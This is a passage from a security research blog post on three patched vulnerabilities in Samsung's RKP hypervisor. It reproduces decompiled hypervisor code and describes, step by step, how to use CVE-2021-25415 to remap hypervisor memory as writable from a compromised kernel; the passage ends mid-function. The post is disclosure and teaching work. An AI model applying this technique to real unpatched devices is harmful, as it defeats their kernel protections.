impalabs space base graphics
Attacking Samsung RKP
Disclaimer

This work was done while we were working at Longterm Security and they have kindly allowed us to release the article on our company's blog.

This is a follow-up to our compendium blog post that presented the internals of Samsung's security hypervisor, including all the nitty-gritty details. This extensive knowledge is put to use in today's blog post that explains how we attacked Samsung RKP. After revealing three vulnerabilities leading to the compromise of the hypervisor or of its assurances, we also describe the exploitation paths we came up with. Finally, we take a look at the patches made by Samsung following our report.

In January 2021, we reported 3 vulnerabilities in Samsung's security hypervisor implementation. Each of the vulnerabilities has a different impact: from writing to hypervisor-enforced read-only memory, to compromising the hypervisor itself. The vulnerabilities were fixed in the June 2021 and October 2021 security updates. While they are specific to Samsung RKP, we think that they are good examples of what you should be keeping an eye out for if you're auditing a security hypervisor running on an ARMv8 device.

We will detail each of the vulnerabilities, explain how they can be exploited, and also take a look at their patch. While we recommend reading the original blog post, because it will make it easier to understand this one, we tried to summarize all the important bits in the introduction. Feel free to skip the introduction if you are already familiar with Samsung RKP.

Introduction

The main goal of a security hypervisor on a mobile device is to ensure kernel integrity at run time, so that even if an attacker has found a kernel vulnerability, they won't be able to modify sensitive kernel data structures, elevate privileges, or execute malicious code. In order to do that, the hypervisor is executing at a higher privilege level (EL2) than the kernel (EL1), and it can have complete control over it by making use of the virtualization extensions.

Virtualization Extensions

One of the features of the virtualization extensions is a second layer of address translation. When it is disabled, there is only one layer of address translation, which translates a Virtual Address (VA) directly into a Physical Address (PA). But when it is enabled, the first layer (stage 1 - under control of the kernel) now translates a VA into what is called an Intermediate Physical Address (IPA), and the second layer (stage 2 - under control of the hypervisor) translates this IPA into the real PA. This second layer has its own memory attributes, allowing the hypervisor to enforce memory permissions that differ from the ones in the kernel page tables, as well as to disable access to physical memory regions.

Another feature of the virtualization extensions, enabled by the use of the Hypervisor Configuration Register (HCR), allows the hypervisor to handle general exceptions and to trap critical operations usually handled by the kernel. Finally, in the cases where the kernel (EL1) needs to call into the hypervisor (EL2), it can do so by executing an HyperVisor Call (HVC) instruction. This is very similar to the SuperVisor Call (SVC) instruction that is used by userland processes (EL0) to call into the kernel (EL1).

Samsung RKP Assurances

Samsung implementation of a security hypervisor enforces that:

  • the page tables cannot be modified directly by the kernel;
    • accesses to virtual memory system registers at EL1 are trapped;
    • page tables are set as read-only in the stage 2 address translation;
      • except for level 3 tables, but in that case the PXNTable bit is set;
  • double mappings are prevented (but the checking is only done by the kernel);
    • still, we can't make the kernel text read-write or a new region executable;
  • sensitive kernel global variables are moved in the .rodata region (read-only);
  • sensitive kernel data structures (cred, task_security_struct, vfsmount) are allocated on read-only pages;
    • on various operations, the credentials of a running task are checked:
      • a task that is not system cannot suddenly become system or root;
      • it is possible to set the cred field of a task_struct in an exploit;
      • but the next operation, like executing a shell, will trigger a violation;
    • credentials are also reference-counted to prevent their reuse by another task;
  • it is not possible to execute a binary as root from outside of specific mount points;
  • on Snapdragon devices, ROPP (ROP prevention) is also enabled by RKP.

Samsung RKP Implementation

Samsung RKP makes extensive use of two utility structures: memlists and sparsemaps.

  • A memlist is a list of address ranges (sort of a specialized version of std::vector).
  • A sparsemap associates values to addresses (sort of a specialized version of std::map).

There are multiple instances of these control structures, listed below by order of initialization:

  • the memlist dynamic_regions contains the DRAM regions (sent by S-Boot);
  • the memlist protected_ranges contains critical hypervisor SRAM/DRAM regions;
  • the sparsemap physmap associates a type (kernel text, PT, etc.) to each DRAM page;
  • the sparsemap ro_bitmap indicates if a DRAM page is read-only in the stage 2;
  • the sparsemap dbl_bitmap is used by the kernel to detect double-mapped DRAM pages;
  • the memlist page_allocator.list contains the DRAM region used by RKP's page allocator;
  • the sparsemap page_allocator.map tracks DRAM pages allocated by RKP's page allocator;
  • the memlist executable_regions contains the kernel's executable pages;
  • the memlist dynamic_load_regions is used by the "dynamic load" feature.

Please note that these control structures are used by the hypervisor for keeping track of what is in memory and how it is mapped. But they have no direct impact on the actual address translation (unlike the stage 2 page tables). The hypervisor has to carefully keep in sync the control structures and page tables to avoid issues.

The hypervisor has multiple allocators, which all serves a different purpose:

  • the "static heap" contains SRAM memory (before initialization) and also DRAM memory (after initialization);
    • It is used for the EL2 page tables, for the memlists and for the PA's descriptors;
  • the "dynamic heap" contains only DRAM memory (and the PA's memory region is carved out of it);
    • It is used for the EL1 stage 2 page tables and for the sparsemaps (entries and bitmaps);
  • the "page allocator" (PA) contains only DRAM memory;
    • It is used for allocating the EL1 stage 1 page tables and for the pages of protected SLUB caches.

Samsung RKP Initialization

The initialization of the hypervisor (alongside of the kernel) is detailed in the first blog post. It is crucial when looking for vulnerabilities to know what the state of the various control structures is at a given moment, as well as what the page tables for the stage 2 at EL1 and stage 1 at EL2 contain. The hypervisor state after initialization is reported below.

The control structures are as follows:

  • The protected_ranges contains the hypervisor code/data and the memory backing the physmap.
  • In the physmap,
    • the kernel .text segment is marked as TEXT;
    • user PGDs, PMDs, and PTEs are marked as L1, L2, L3 respectively;
    • kernel PGDs, PMDs, and PTEs are marked as KERNEL|L1, KERNEL|L2, KERNEL|L3 respectively.
  • The ro_bitmap contains the kernel .text and .rodata segments, and other pages that have been made read-only in the stage 2 (like the L1, L2, and some of the L3 kernel page tables).
  • The executable_regions contains the kernel .text segment and trampoline page.

In the page tables of EL2 stage 1 (controlling what the hypervisor can access):

  • the hypervisor segments are mapped (from the initial PTs);
  • the log and "bigdata" regions are mapped as RW;
  • the kernel .text segment is mapped as RO;
  • the first page of swapper_pg_dir is mapped as RW.

In the page tables of EL1 stage 2 (controlling what the kernel can really access):

  • the hypervisor memory region is unmapped;
  • empty_zero_page is mapped as RWX;
  • the log region is mapped as ROX;
  • the region backing the "dynamic heap" is mapped as ROX;
  • PGDs are mapped as RO:
    • the PXN bit is set on block descriptors;
    • the PXN bit is set on table descriptors but only for user PGDs.
  • PMDs are mapped as RO:
    • the PXN bit is set on descriptor for VAs not in the executable_regions.
  • PTEs are mapped as RO for VAs in the executable_regions.
  • the kernel .text segment is mapped as ROX.

Our Research Device

Our test device during this research was a Samsung A51 (SM-A515F). Instead of using a full exploit chain, we have downloaded the kernel source code on Samsung's Open Source website, added a few syscalls, recompiled the kernel, and flashed it onto the device.

The new syscalls make it really convenient to interact with RKP and allow us from userland to:

  • read kernel memory;
  • write kernel memory;
  • allocate kernel memory;
  • free kernel memory;
  • make a hypervisor call (using the uh_call function).

Remapping RKP memory as writable from EL1

SVE-2021-20178 (CVE-2021-25415): Possible remapping RKP memory as writable from EL1

Severity: High
Affected versions: Q(10.0), R(11.0) devices with Exynos9610, 9810, 9820, 9830
Reported on: January 4, 2021
Disclosure status: Privately disclosed.
Assuming EL1 is compromised, an improper address validation in RKP prior to SMR JUN-2021 Release 1 allows local attackers to remap EL2 memory as writable.
The patch adds the proper address validation in RKP to prevent change of EL2 memory attribution from EL1.

Vulnerability

When RKP needs to change the permissions of a memory region in the stage 2, it uses either rkp_s2_page_change_permission that operates on a single page, or rkp_s2_range_change_permission that operates on an address range. These functions can be abused to remap hypervisor memory (that was unmapped during initialization) as writable from the kernel, allowing to fully compromise the security hypervisor. Let's see how and why we can do that.

int64_t rkp_s2_page_change_permission(void* p_addr, uint64_t access, uint32_t exec, uint32_t allow) {
  // ...

  if (!allow && !rkp_inited) {
    uh_log('L', "rkp_paging.c", 574, "s2 page change access not allowed before init %d", allow);
    rkp_policy_violation("s2 page change access not allowed, p_addr : %p", p_addr);
    return -1;
  }
  if (is_phys_map_s2unmap(p_addr)) {
    rkp_policy_violation("Error page was s2 unmapped before %p", p_addr);
    return -1;
  }
  if (page_allocator_is_allocated(p_addr) == 1) {
    return 0;
  }
  if (p_addr >= TEXT_PA && p_addr < ETEXT_PA) {
    return 0;
  }
  if (p_addr >= rkp_get_pa(SRODATA) && p_addr < rkp_get_pa(ERODATA)) {
    return 0;
  }
  uh_log('L', "rkp_paging.c", 270, "Page access change out of static RO range %lx %lx %lx", p_addr, access, exec);
  if (access == 0x80) {
    ++page_ro;
    attrs = UNKN1 | READ;
  } else {
    ++page_free;
    attrs = UNKN1 | WRITE | READ;
  }
  if (p_addr == ZERO_PG_ADDR || exec) {
    attrs |= EXEC;
  }
  if (map_s2_page(p_addr, p_addr, 0x1000, attrs) < 0) {
    rkp_policy_violation("map_s2_page failed, p_addr : %p, attrs : %d", p_addr, attrs);
    return -1;
  }
  tlbivaae1is(((p_addr + 0x80000000) | 0xffffffc000000000) >> 12);
  return rkp_set_pgt_bitmap(p_addr, access);
}

rkp_s2_page_change_permission does some checking on its arguments:

  • if allow == 0, then RKP must be initialized;
  • the page must not be marked S2UNMAP in the physmap;
  • it must not be belong to the hypervisor page allocator (robuf sparsemap);
  • it must not be in the kernel .text or .rodata segments.

After that it determines the memory attributes to apply to the page based on the arguments, calls map_s2_page that effectively modifies the stage 2 page tables, flushes the TLBs and marks the page as read-only or not in the ro_bitmap.

int64_t rkp_s2_range_change_permission(uint64_t start_addr,
                                       uint64_t end_addr,
                                       uint64_t access,
                                       uint32_t exec,
                                       uint32_t allow) {
  // ...

  uh_log('L', "rkp_paging.c", 195, "RKP_4acbd6db%lxRKP_00950f15%lx", start_addr, end_addr);
  if (!allow && !rkp_inited) {
    uh_log('L', "rkp_paging.c", 593, "s2 range change access not allowed before init");
    rkp_policy_violation("Range change permission prohibited");
  } else if (allow != 2 && rkp_deferred_inited) {
    uh_log('L', "rkp_paging.c", 603, "s2 change access not allowed after def-init");
    rkp_policy_violation("Range change permission prohibited");
  }
  if (((start_addr | end_addr) & 0xfff) != 0) {
    uh_log('L', "rkp_paging.c", 203, "start or end addr is not aligned, %p - %p", start_addr, end_addr);
    return -1;
  }
  if (start_addr > end_addr) {
    uh_log('L', "rkp_paging.c", 208, "start addr is bigger than end addr %p, %p", start_addr, end_addr);
    return -1;
  }
  size = end_addr - start_addr;
  if (access == 0x80) {
    attrs = UNKN1 | READ;
  } else {
    attrs = UNKN1 | WRITE | READ;
  }
  if (exec) {
    attrs |= EXEC;
  }
  p_addr_start = start_addr;
  if (s2_map(start_addr, end_addr - start_addr, attrs, &p_addr_start) < 0) {
    uh_log('L', "rkp_paging.c", 222, "s2_map returned false, p_addr_start : %p, size : %p", p_start_addr, size);
    return -1;
  }
  if (start_addr == end_addr) {
    return 0;
  }
  addr = start_addr;
  do {
    res = rkp_set_pgt_bitmap(addr, access);
    if (res < 0) {
      uh_log('L', "rkp_paging.c", 229, "set_pgt_bitmap fail, %p", addr);
      return res;
    }
    tlbivaae1is(((addr + 0x80000000) | 0xffffffc000000000) >> 12);
    addr += 0x1000;
  } while (addr < end_addr);
  return 0;
}

rkp_s2_range_change_permission also does some checking on its arguments:

  • if allow == 0, then RKP must be initialized;
  • if allow == 1, then RKP must be deferred initialized;
  • start_addr and end_addr must be page-aligned;
  • start_addr must be lower than end_addr.

After that it also determines the memory attributes to apply to the page based on the arguments, calls s2_map that effectively modifies the stage 2 page tables, marks the pages as read-only or not in the ro_bitmap, and flushes the TLBs.

int64_t s2_map(uint64_t orig_addr, uint64_t orig_size, attrs_t attrs, uint64_t* paddr) {
  // ...

  if (!paddr) {
    return -1;
  }
  addr = orig_addr - (orig_addr & 0xfff);
  size = (orig_addr & 0xfff) + orig_size;
  if (!size) {
    return 0;
  }
  while (size > 0x1fffff && (addr & 0x1fffff) == 0) {
    if (map_s2_page(*paddr, addr, 0x200000, attrs)) {
      uh_log('L', "s2.c", 1132, "unable to map 2mb s2 page: %p", addr);
      return -1;
    }
    size -= 0x200000;
    addr += 0x200000;
    *paddr += 0x200000;
    if (!size) {
      return 0;
    }
  }
  while (size > 0xfff && (addr & 0xfff) == 0) {
    if (map_s2_page(*paddr, addr, 0x1000, attrs)) {
      uh_log('L', "s2.c", 1150, "unable to map 4kb s2 page: %p", addr);
      return -1;
    }
    size -= 0x1000;
    addr += 0x1000;
    *paddr += 0x1000;
    if (!size) {
      return 0;
    }
  }
  return 0;
}

s2_map is a wrapper around map_s2_page that takes into account the various page/block sizes that make up the memory range given as argument. map_s2_page directly operates on the page tables and does not care about anything else (in particular, the control structures).

You might have already noticed that rkp_s2_range_change_permission doesn't do as many checks as rkp_s2_page_change_permission. In particular, it doesn't ensure that the pages of the memory range are not marked S2UNMAP in the physmap. So if we give it a memory range in to the hypervisor, it will happily remap it in the stage 2.

But the check of the physmap in rkp_s2_page_change_permission doesn't even matter. One would expect a page to marked S2UNMAP in the physmap when it is actually unmapped from the stage 2. Below is the code of s2_unmap that does the unmapping:

int64_t s2_unmap(uint64_t orig_addr, uint64_t orig_size) {
  // ...

  addr = orig_addr & 0xfffffffffffff000;
  size = (orig_addr & 0xfff) + orig_size;
  if (!size) {
    return 0;
  }
  while (size > 0x3fffffff && (addr & 0x3fffffff) == 0) {
    if (unmap_s2_page(addr, 0x40000000)) {
      uh_log('L', "s2.c", 1175, "unable to unmap 1gb s2 page: %p", addr);
      return -1;
    }
    size -= 0x40000000;
    addr += 0x40000000;
    if (!size) {
      return 0;
    }
  }
  while (size > 0x1fffff && (addr & 0x1fffff) == 0) {
    if (unmap_s2_page(addr, 0x200000)) {
      uh_log('L', "s2.c", 1183, "unable to unmap 2mb s2 page: %p", addr);
      return -1;
    }
    size -= 0x200000;
    addr += 0x200000;
    if (!size) {
      return 0;
    }
  }
  while (size > 0xfff && (addr & 0xfff) == 0) {
    if (unmap_s2_page(addr, 0x1000)) {
      uh_log('L', "s2.c", 1191, "unable to unmap 4kb s2 page: %p", addr);
      return -1;
    }
    size -= 0x1000;
    addr += 0x1000;
    if (!size) {
      return 0;
    }
  }
  return 0;
}

s2_unmap, similarly to s2_map, is a wrapper around unmap_s2_page. It turns out there really are no calls to rkp_phys_map_set, rkp_phys_map_set_region, or even the low level sparsemap_set_value_addr, that ever mark a page as S2UNMAP. So we can even use rkp_s2_page_change_permission to remap hypervisor memory.

Exploitation

To exploit this two-fold bug, we need to look for calls to the rkp_s2_page_change_permission and rkp_s2_range_change_permission functions, that can be triggered from the kernel after the hypervisor has been initialized, and with controllable arguments.

Exploring Our Options

rkp_s2_page_change_permission is called:

And rkp_s2_range_change_permission is called:

  • in many dynamic_load_xxx functions

rkp_lxpgt_process_table

We have taken a closer look at the functions rkp_l1pgt_process_table, rkp_l2pgt_process_table and rkp_l3pgt_process_table in the first blog post. It seems fairly easy to reach the call to rkp_s2_page_change_permission in these functions, assuming that we control their first argument.

If the third argument is_alloc == 1, then the page needs to not be marked as LX in the physmap, and as a result it will be set as read-only in the stage 2 and marked as LX in the physmap. If the third argument is_alloc == 0, then the page needs to be marked as LX in the physmap, and as a result it will be set as read-write in the stage 2 and marked as FREE in the physmap. So by calling the function twice, once with is_alloc == 1 and once with is_alloc == 0, we should be able to call rkp_s2_page_change_permission with the read-write permissions (and then write to hypervisor memory directly from the kernel).

The next questions is: can we call the rkp_lxpgt_process_table functions with controlled arguments?

rkp_l1pgt_process_table is called:

int64_t rkp_l1pgt_ttbr(uint64_t ttbr, uint32_t user_or_kernel) {
  // ...

  pgd = ttbr & 0xfffffffff000;
  if (!rkp_deferred_inited) {
    should_process = 0;
  } else {
    should_process = 1;
    if (user_or_kernel == 0x1ffffff || pgd != ZERO_PG_ADDR) {
      if (!rkp_inited) {
        should_process = 0;
      }
      if (pgd == INIT_MM_PGD) {
        should_process = 0;
      }
      if (pgd == TRAMP_PGD && TRAMP_PGD) {
        should_process = 0;
      }
    } else {
      if ((get_sctlr_el1() & 1) != 0 || !rkp_inited) {
        should_process = 0;
      }
    }
  }
  if (should_process && rkp_l1pgt_process_table(pgd, user_or_kernel, 1) < 0) {
    return rkp_policy_violation("Process l1t returned false, l1e addr : %lx", pgd);
  }
  if (!user_or_kernel) {
    return set_ttbr0_el1(ttbr);
  } else {
    return set_ttbr1_el1(ttbr);
  }
}

ttbr and user_or_kernel are user-controlled, rkp_deferred_inited == 1, rkp_inited == 1, the MMU is enabled, so if either:

  • user_or_kernel == 0 and pgd == ZERO_PG_ADDR
  • user_or_kernel == 0x1FFFFFF and pgd != INIT_MM_PGD && pgd != TRAMP_PGD

then we should have should_process == 1 and rkp_l1pgt_process_table will be called. But it will also either set the system register TTBR0_EL1 or TTBR1_EL1, and we don't control the is_alloc argument, so it is not an optimal path. Let's take a look at the others.

We have already seen the functions rkp_l1pgt_new_pgd and rkp_l1pgt_free_pgd in the first blog post. They are very good candidates, but there is one drawback to using them. The value given to rkp_l1pgt_process_table comes from a call to rkp_get_pa, which itself calls check_kernel_input, a function that checks if the physical address is in the protected_ranges memlist. So we can't give it an hypervisor address directly. Instead what we need to do is to reach the processing of the next level, so that the value given to rkp_l2pgt_process_table comes from a descriptor's output address and not from a call to rkp_get_pa.

rkp_l2pgt_process_table is called:

  • in rkp_l1pgt_process_table
  • in rkp_l1pgt_write

And rkp_l3pgt_process_table is called:

  • in check_single_l2e (called from rkp_l2pgt_process_table and rkp_l2pgt_write)

Finally, we have also seen the functions rkp_l1pgt_write and rkp_l2pgt_write in the first blog post. They are very good candidates too that allow calling rkp_l2pgt_process_table and rkp_l3pgt_process_table by writing in the kernel page tables a fake level 1 and level 2 descriptor respectively.

For the sake of completeness, we will take a look at our other options, even if we already have a good path to exploit the vulnerability.

set_range_to_xxx_l3

set_range_to_pxn_l3 is called all the way from rkp_set_range_to_pxn:

int64_t rkp_set_range_to_pxn(uint64_t table, uint64_t start_addr, uint64_t end_addr) {
  // ...

  res = set_range_to_pxn_l1(table, start_addr, end_addr);
  if (res) {
    uh_log('W', "rkp_l1pgt.c", 186, "Fail to change attribute to pxn");
    return res;
  }
  size = end_addr - start_addr;
  invalidate_s1_el1_tlb_region(start_addr, size);
  paddr = rkp_get_pa(start_addr);
  invalidate_instruction_cache_region(paddr, size);
  return 0;
}
int64_t set_range_to_pxn_l1(uint64_t table, uint64_t start_addr, uint64_t end_addr) {
  // ...

  rkp_phys_map_lock(table);
  if (is_phys_map_kernel(table) && is_phys_map_l1(table)) {
    next_start_addr = start_addr;
    res = 0;
    do {
      next_end_addr = (next_start_addr & 0xffffffffc0000000) + 0x40000000;
      if (next_end_addr > end_addr) {
        next_end_addr = end_addr;
      }
      table_desc = *(table + 8 * ((next_start_addr >> 30) & 0x1ff));
      if ((table_desc & 3) == 3) {
        res += set_range_to_pxn_l2(table_desc & 0xfffffffff000, next_start_addr, next_end_addr);
      }
      next_start_addr = next_end_addr;
    } while (next_start_addr < end_addr);
  } else {
    res = -1;
  }
  rkp_phys_map_unlock(table);
  return res;
}
int64_t set_range_to_pxn_l2(uint64_t table, uint64_t start_addr, int64_t end_addr) {
  // ...

  rkp_phys_map_lock(table);
  if (is_phys_map_kernel(table) && is_phys_map_l2(table)) {
    next_start_addr = start_addr;
    res = 0;
    do {
      next_end_addr = (next_start_addr & 0xffffffffffe00000) + 0x200000;
      if (next_end_addr > end_addr) {
        next_end_addr = end_addr;
      }
      table_desc_p = table + 8 * ((next_start_addr >> 21) & 0x1ff);
      if ((*table_desc_p & 3) == 3) {
        if (!executable_regions_contains(*table_desc_p)) {
          set_pxn_bit_of_desc(table_desc_p, 2);
        }
        res += set_range_to_pxn_l3(*table_desc_p & 0xfffffffff000, next_start_addr, next_end_addr);
      } else if (*table_desc_p && !executable_regions_contains(*table_desc_p)) {
        set_pxn_bit_of_desc(table_desc_p, 2);
      }
      next_start_addr = next_end_addr;
    } while (next_start_addr < end_addr);
  } else {
    res = -1;
  }
  rkp_phys_map_unlock(table);
  return res;
}
int64_t set_range_to_pxn_l3(uint64_t table, uint64_t start_addr, uint64_t end_addr) {
  // ...

  rkp_phys_map_lock(table);
  if (is_phys_map_kernel(table) && is_phys_map_l3(table)) {
    res = rkp_s2_page_change_permission(table, 0, 0, 0);
    if (res < 0) {
      uh_log('L', "rkp_l3pgt.c", 153, "pxn l3t failed, %lx", table);
      rkp_phys_map_unlock(table);
      return res;
    }
    res = rkp_phys_map_set(table, FREE);
    if (res < 0) {
      rkp_phys_map_unlock(table);
      return res;
    }
  }
  next_start_addr = start_addr;
  do {
    next_end_addr = (next_start_addr + 0x1000) & 0xfffffffffffff000;
    if (next_end_addr > end_addr) {
      next_end_addr = end_addr;
    }
    table_desc_p = table + 8 * ((next_start_addr >> 12) & 0x1ff);
    if ((*table_desc_p & 3) == 3 && !executable_regions_contains(*table_desc_p, 3)) {
      set_pxn_bit_of_desc(table_desc_p, 3);
    }
    next_start_addr = next_end_addr;
  } while (next_start_addr < end_addr);
  rkp_phys_map_unlock(table);
  return 0;
}

rkp_set_range_to_pxn is always called with INIT_MM_PGD (swapper_pg_dir) as its first argument. It will walk the kernel page tables (stage 1) and set the PXN bit of the pages and blocks spanning over the specified address range. The call to rkp_s2_page_change_permission only happens for level 3 tables that are marked KERNEL|L3 in the physmap.

It is not the best option for many reasons: our target page of hypervisor memory would need to be marked KERNEL|L3 in the physmap, it requires to have already written a user-controlled descriptor into the kernel page tables (bringing us back to the rkp_lxpgt_process_table functions that we have seen above), and the "dynamic load" feature is only available on Exynos devices, as we are going to see with the next vulnerability.

set_range_to_rox_l3 is called all the way from rkp_set_range_to_rox:

int64_t rkp_set_range_to_rox(uint64_t table, uint64_t start_addr, uint64_t end_addr) {
  // ...

  res = set_range_to_rox_l1(table, start_addr, end_addr);
  if (res) {
    uh_log('W', "rkp_l1pgt.c", 199, "Fail to change attribute to rox");
    return res;
  }
  size = end_addr - start_addr;
  invalidate_s1_el1_tlb_region(start_addr, size);
  paddr = rkp_get_pa(start_addr);
  invalidate_instruction_cache_region(paddr, size);
  return 0;
}
int64_t set_range_to_rox_l1(uint64_t table, uint64_t start_addr, uint64_t end_addr) {
  // ...

  if (table != INIT_MM_PGD) {
    rkp_policy_violation("rox only allowed on kerenl PGD! l1t : %lx", table);
    return -1;
  }
  rkp_phys_map_lock(table);
  if (is_phys_map_kernel(table) && is_phys_map_l1(table)) {
    next_start_addr = start_addr;
    res = 0;
    do {
      next_end_addr = (next_start_addr & 0xffffffffc0000000) + 0x40000000;
      if (next_end_addr > end_addr) {
        next_end_addr = end_addr;
      }
      table_desc_p = table + 8 * ((next_start_addr >> 30) & 0x1ff);
      if ((*table_desc_p & 3) == 3) {
        set_rox_bits_of_desc(table_desc_p, 1);
        res += set_range_to_rox_l2(*table_desc_p & 0xfffffffff000, next_start_addr, next_end_addr);
      } else if (*table_desc_p) {
        set_rox_bits_of_desc(table_desc_p, 1);
      }
      next_start_addr = next_end_addr;
    } while (next_start_addr < end_addr);
  } else {
    res = -1;
  }
  rkp_phys_map_unlock(table);
  return res;
}
int64_t set_range_to_rox_l2(uint64_t table, uint64_t start_addr, uint64_t end_addr) {
  // ...

  rkp_phys_map_lock(table);
  if (is_phys_map_kernel(table) && is_phys_map_l2(table)) {
    next_start_addr = start_addr;
    do {
      next_end_addr = (next_start_addr & 0xffffffffffe00000) + 0x200000;
      if (next_end_addr > end_addr) {
        next_end_addr = end_addr;
      }
      table_desc_p = table + 8 * ((next_start_addr >> 21) & 0x1ff);
      if ((*table_desc_p & 3) == 3) {
        set_rox_bits_of_desc(table_desc_p, 2);
        res += set_range_to_rox_l3(*table_desc_p & 0xfffffffff000, next_start_addr, next_end_addr);
      } else if (*table_desc_p) {
        set_rox_bits_of_desc(table_desc_p, 2);
      }
      next_start_addr = next_end_addr;
    } while (next_start_addr < end_addr);
  } else {
    res = -1;
  }
  rkp_phys_map_unlock(table);
  return res;
}
int64_t set_range_to_rox_l3(uint64_t table, uint64_t start_addr, uint64_t end_addr) {
  // ...

  rkp_phys_map_lock(table);
  if (!is_phys_map_kernel(table) || !is_phys_map_l3(table)) {
    res = rkp_s2_page_change_permission(table, 0x80, 0, 0);
    if (res < 0) {
      uh_log('L', "rkp_l3pgt.c", 193, "rox l3t failed, %lx", table);
      rkp_phys_map_unlock(table);
      return res;
    }
    res = rkp_phys_map_set(table, FLAG2 | KERNEL | L3);
    if (res < 0) {
      rkp_phys_map_unlock(table);
      return res;
    }
  }
  next_start_addr = start_addr;
  do {
    next_end_addr = (next_start_addr + 0x1000) & 0xfffffffffffff000;
    if (next_end_addr > end_addr) {
      next_end_addr = end_addr;
    }
    table_desc_p = table + 8 * ((next_start_addr >> 12) & 0x1ff);
    if ((*table_desc_p & 3) == 3) {
      set_rox_bits_of_desc(table_desc_p, 3);
    }
    next_start_addr = next_end_addr;
  } while (next_start_addr < end_addr);
  rkp_phys_map_unlock(table);
  return 0;
}

rkp_set_range_to_rox is also always called with INIT_MM_PGD (swapper_pg_dir) as its first argument. It will walk the kernel page tables (stage 1) and set the permissions bits of the pages and blocks spanning over the specified address range to make them read-only. The call to rkp_s2_page_change_permission also only happens for level 3 tables, but that are not marked either KERNEL or L3 in the physmap.

It is not the best option either for similar reasons: the target page is set as read-only in the stage 2, it requires to already have written a user-controlled descriptor into the kernel page tables, and the "dynamic load" feature is only present on Exynos devices.

The Remaining Options

The last 2 functions that calls rkp_s2_page_change_permission are rkp_set_pages_ro and rkp_ro_free_pages. Unfortunately, they give to the rkp_s2_page_change_permission function an address that comes from a call to rkp_get_pa, so they are unusable for our exploit.

Finally, rkp_s2_range_change_permission is called from many dynamic_load_xxx functions, but as we have mentioned above, the "dynamic load" feature is only available on Exynos devices and we would like to keep the exploit as generic as possible.

Remapping Our Target Page

To exploit the vulnerability, we decided to use rkp_l1pgt_new_pgd and rkp_l1pgt_free_pgd. Since these functions call rkp_l1pgt_process_table with a physical address coming from rkp_get_pa, we will be targeting the rkp_s2_range_change_permission call in the rkp_l2pgt_process_table function instead. To reach this code, we can give as input to rkp_l1pgt_process_table a "fake PGD" that contains a single descriptor pointing to a "fake PMD" (our target hypervisor memory page).

The first step is to call rkp_cmd_new_pgd, which simply calls rkp_l1pgt_new_pgd.

rkp_l1pgt_new_pgd calls rkp_l1pgt_process_table, that will process our "fake PGD" located in kernel memory (high_bits is 0 and is_alloc is 1):

int64_t rkp_l1pgt_process_table(int64_t pgd, uint32_t high_bits, uint32_t is_alloc) {
  // ...
  rkp_phys_map_lock(pgd);
  if (is_alloc) {
    if (is_phys_map_l1(pgd)) {
      rkp_phys_map_unlock(pgd);
      return 0;
    }
    // ...
    res = rkp_phys_map_set(pgd, L1);
    // ...
    res = rkp_s2_page_change_permission(pgd, 0x80, 0, 0);
    // ...
  }
  // ...
  // for each descriptor:
  do {
    // ...
    if ((desc & 3) != 3) {
      if (desc) {
        set_pxn_bit_of_desc(desc_p, 1);
      }
    } else {
      addr = start_addr & 0xffffff803fffffff | offset;
      res += rkp_l2pgt_process_table(desc & 0xfffffffff000, addr, is_alloc);
      set_pxn_bit_of_desc(desc_p, 1);
    }
    // ...
  } while (entry != 0x1000);
  rkp_phys_map_unlock(pgd);
  return res;
}

rkp_l1pgt_process_table changes the type of the page in the physmap to L1, sets the page as read-only in stage 2, then calls rkp_l2pgt_process_table on our "fake PMD" (our target page) located in hypervisor memory:

int64_t rkp_l2pgt_process_table(int64_t pmd, uint64_t start_addr, uint32_t is_alloc) {
  // ...
  rkp_phys_map_lock(pmd);
  if (is_alloc) {
    if (is_phys_map_l2(pmd)) {
      rkp_phys_map_unlock(pmd);
      return 0;
    }
    // ...
    res = rkp_phys_map_set(pmd, L2);
    // ...
    res = rkp_s2_page_change_permission(pmd, 0x80, 0, 0);
    // ...
  }
  // ...
  offset = 0;
  for (i = 0; i != 0x1000; i += 8) {
    addr = offset | start_addr & 0xffffffffc01fffff;
    res += check_single_l2e(pmd + i, addr, is_alloc);
    offset += 0x200000;
  }
  rkp_phys_map_unlock(pgd);
  return res;
}

rkp_l2pgt_process_table changes the type of the page in the physmap to L2, sets the page as read-only in the stage 2 page tables, then calls check_single_l2e on each entry of the "fake PMD" (that we don't have control of):

int64_t check_single_l2e(int64_t* desc_p, uint64_t start_addr, signed int32_t is_alloc) {
  // ...
  set_pxn_bit_of_desc(desc_p, 2);
  // ...
  desc = *desc_p;
  type = *desc & 3;
  if (type == 1) {
    return 0;
  }
  if (type != 3) {
    if (desc) {
      uh_log('L', "rkp_l2pgt.c", 64, "Invalid l2e %p %p %p", desc, is_alloc, desc_p);
    }
    return 0;
  }
  // ...
  return rkp_l3pgt_process_table(*desc_p & 0xfffffffff000, start_addr, is_alloc, protect);
}

check_single_l2e will set the PXN bit of the descriptor (which in our case is each 8-byte value in our target page) and will process values that look like a table descriptor. That's something we will need to keep in mind when choosing our target page in hypervisor memory.

Up to this point, we have gotten our target page set as L2 in the physmap, and read-only in the stage 2 page tables.

The second step is to call rkp_cmd_free_pgd, which calls rkp_l1pgt_free_pgd.

rkp_l1pgt_free_pgd calls rkp_l1pgt_process_table, that once again will process our "fake PGD" (high_bits is 0 but this time is_alloc is 0):

int64_t rkp_l1pgt_process_table(int64_t pgd, uint32_t high_bits, uint32_t is_alloc) {
  // ...
  rkp_phys_map_lock(pgd);
  if (!is_alloc) {
    if (!is_phys_map_l1(pgd)) {
      rkp_phys_map_unlock(pgd);
      return 0;
    }
    res = rkp_phys_map_set(pgd, FREE);
    // ...
    res = rkp_s2_page_change_permission(pgd, 0, 1, 0);
    // ...
  }
  offset = 0;
  entry = 0;
  start_addr = high_bits << 39;
  // ...
  // for each descriptor:
  do {
    if ((desc & 3) != 3) {
      if (desc) {
        set_pxn_bit_of_desc(desc_p, 1);
      }
    } else {
      addr = start_addr & 0xffffff803fffffff | offset;
      res += rkp_l2pgt_process_table(desc & 0xfffffffff000, addr, is_alloc);
      if (!(start_addr >> 39)) {
        set_pxn_bit_of_desc(desc_p, 1);
      }
    }
    // ...
  } while (entry != 0x1000);
  rkp_phys_map_unlock(pgd);
  return res;
}

rkp_l1pgt_process_table changes the type of the page in the physmap to FREE, sets the page as read-write, then calls rkp_l2pgt_process_table on our "fake PMD":

int64_t rkp_l2pgt_process_table(int64_t pmd, uint64_t start_addr, uint32_t is_alloc) {
  // ...
  rkp_phys_map_lock(pmd);
  if (!is_alloc) {
